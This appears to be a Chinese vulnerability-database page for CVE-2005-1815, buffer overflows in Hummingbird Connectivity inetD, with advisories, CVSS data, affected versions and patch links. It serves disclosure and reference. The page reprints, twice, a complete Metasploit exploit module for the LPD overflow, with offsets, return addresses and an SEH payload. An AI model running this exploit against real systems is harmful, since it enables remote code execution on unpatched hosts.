CVE-2005-1815
CVSS5.0
发布时间 :2005-06-01 00:00:00
修订时间 :2008-09-05 16:50:10
NMCOEPS    

[原文]Multiple buffer overflows in Hummingbird Connectivity inetD 10.0.0.1 and 9.0.0.4 allows attackers to cause a denial of service and possibly execute arbitrary code via (1) an FTP command with a long argument to FTPD (ftpdw.exe) or (2) a large amount of data to LPD (Lpdw.exe).


[CNNVD]Hummingbird InetD 缓冲区溢出漏洞(CNNVD-200506-016)

        Hummingbird InetD是一种运行于Windows平台的Unix类网络服务器程序。
        Hummingbird InetD的两个组件实现上存在缓冲区溢出漏洞,远程攻击者可能利用这些漏洞控制服务器。
        InetD FTPD组件(ftpdw.exe)处理超长的命令行参数时存在漏洞,远程攻击者可能利用此漏洞导致缓冲区溢出执行任意指令。
        InetD LPD组件(Lpdw.exe) 在处理超长数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞导致缓冲区溢出执行任意指令。
        <**>
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:hummingbird:connectivity:10.0Hummingbird Connectivity 10.0
cpe:/a:hummingbird:connectivity:9.0Hummingbird Connectivity 9.0
cpe:/a:hummingbird:connectivity:7.1Hummingbird Connectivity 7.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1815
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1815
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-016
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/13790
(VENDOR_ADVISORY)  BID  13790
http://www.securityfocus.com/bid/13788
(VENDOR_ADVISORY)  BID  13788
http://secunia.com/advisories/15557
(VENDOR_ADVISORY)  SECUNIA  15557
http://connectivity.hummingbird.com/support/nc/exceed/lpdw_advisory.html
(PATCH)  CONFIRM  http://connectivity.hummingbird.com/support/nc/exceed/lpdw_advisory.html
http://connectivity.hummingbird.com/support/nc/exceed/ftpd_advisory.html?cks=y
(PATCH)  CONFIRM  http://connectivity.hummingbird.com/support/nc/exceed/ftpd_advisory.html?cks=y

- 漏洞信息

Hummingbird InetD 缓冲区溢出漏洞
中危 缓冲区溢出
2005-06-01 00:00:00 2005-10-20 00:00:00
远程  
        Hummingbird InetD是一种运行于Windows平台的Unix类网络服务器程序。
        Hummingbird InetD的两个组件实现上存在缓冲区溢出漏洞,远程攻击者可能利用这些漏洞控制服务器。
        InetD FTPD组件(ftpdw.exe)处理超长的命令行参数时存在漏洞,远程攻击者可能利用此漏洞导致缓冲区溢出执行任意指令。
        InetD LPD组件(Lpdw.exe) 在处理超长数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞导致缓冲区溢出执行任意指令。
        <**>
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://connectivity.hummingbird.com/support/nc/exceed/ftpd_advisory.html
        http://connectivity.hummingbird.com/support/nc/exceed/lpdw_advisory.html

- 漏洞信息 (16337)

Hummingbird Connectivity 10 SP5 LPD Buffer Overflow (EDBID:16337)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: hummingbird_exceed.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Hummingbird Connectivity
				10 LPD Daemon. This module has only been tested against Hummingbird
				Exceed v10 with SP5.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-1815'],
					['OSVDB', '16957'],
					['BID', '13788'],
				],
			'Privileged'     => true,

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],
					['Windows XP English SP0/SP1',   { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],
				],

			'DisclosureDate' => 'May 27 2005'))

		register_options( [ Opt::RPORT(515) ], self.class )
	end

	def exploit
		connect

		filler = rand_text_english(target['Offset'], payload_badchars)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83128)

Hummingbird Connectivity 10 SP5 LPD Buffer Overflow (PacketStormID:F83128)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-1815
[点击下载]

This Metasploit module exploits a stack overflow in Hummingbird Connectivity 10 LPD Daemon. This Metasploit module has only been tested against Hummingbird Exceed v10 with SP5.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Hummingbird Connectivity
				10 LPD Daemon. This module has only been tested against Hummingbird
				Exceed v10 with SP5.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-1815'],
	  				['OSVDB', '16957'],
					['BID', '13788'],
				],
			'Privileged'     => true,
						
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],
					['Windows XP English SP0/SP1',   { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],
				],

			'DisclosureDate' => 'May 27 2005'))
			
			register_options( [ Opt::RPORT(515) ], self.class )
	end

	def exploit
		connect
		
		filler = rand_text_english(target['Offset'], payload_badchars)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		print_status("Trying target #{target.name}...")
		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

16956
Hummingbird InetD FTP Component (ftpdw.exe) Command Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-18 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Hummingbird Connectivity 10 FTP Daemon Heap Overflow Vulnerability
Boundary Condition Error 13790
Yes No
2005-05-27 12:00:00 2009-07-12 02:56:00
Discovery of this issue is credited to Ollie Whitehouse of Symantec.

- 受影响的程序版本

Hummingbird Connectivity 10.0
Hummingbird Connectivity 9.0
Hummingbird Connectivity 7.1

- 漏洞讨论

Hummingbird Connectivity 10 FTP daemon is prone to a remote heap-based buffer overflow vulnerability. The issue manifests due to a lack of sufficient boundary checks performed on user-supplied data.

With successful exploitation, an unauthenticated attacker is able to leverage this issue to leak portions of memory from the vulnerable process.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The vendor has released an advisory, along with fixes to address this issue. Please see the referenced advisory for further information.


Hummingbird Connectivity 10.0

Hummingbird Connectivity 9.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站